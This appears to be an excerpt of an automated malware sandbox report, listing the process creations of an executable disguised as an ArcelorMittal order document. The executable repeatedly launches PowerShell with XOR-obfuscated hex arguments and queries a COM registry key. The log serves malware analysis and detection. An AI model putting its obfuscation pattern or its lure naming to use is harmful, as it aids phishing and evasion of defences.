    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
